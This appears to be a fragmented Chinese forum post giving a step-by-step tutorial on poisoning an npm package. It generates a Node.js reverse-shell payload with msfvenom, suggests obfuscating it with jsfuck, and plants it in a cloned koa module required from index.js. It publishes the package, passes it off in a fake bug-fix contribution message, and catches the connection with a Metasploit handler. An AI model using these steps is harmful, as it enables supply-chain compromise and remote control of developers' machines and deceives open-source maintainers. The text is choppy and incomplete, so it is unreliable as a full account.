msfvenom -l | grep node可以列出所有支持 Node.js 的 payload。这相当于到店里问:老板!我要买鱼钩!要能钓 Node.js 的那种!老板:好嘞!要哪款?
msfvenom -p nodejs/shell_reverse_tcp LHOST=192.168.199.165 LPORT=5432 -o index.js这里说一下配置的参数:
cat index.js命令,可以看到 payload 长什么样。
alert(1)用 jsfuck 能把它变得连老妈都认不出来:
git clone github.com/koa-modules…把我们生成的 payload 复制到项目路径下,并在 index.js 中引入这个文件。
npm publish为了演示,我在本地搭了一个 npm 服务器。
我帮你修复了问题 XXX,还加上了彩色 logger 的功能!我们是在给开源社区做贡献呐!
msfconsole进入metasploit的控制台。然后输入:
use exploit/multi/handler使用 handler 模块。并在 handler 模块中设置 payload,攻击主机 IP,攻击主机端口,并启动监听:
set payload nodejs/shell_reverse_tcpset LHOST 192.168.199.165set LPORT 5432run如图,反向TCP监听已经成功启动:
sw_vers # 查看操作系统
sysctl -n machdep.cpu.brand_string # 查看操作系统
| 欢迎光临 黑马程序员技术交流社区 (http://bbs.itheima.com/) | 黑马程序员IT技术论坛 X3.2 |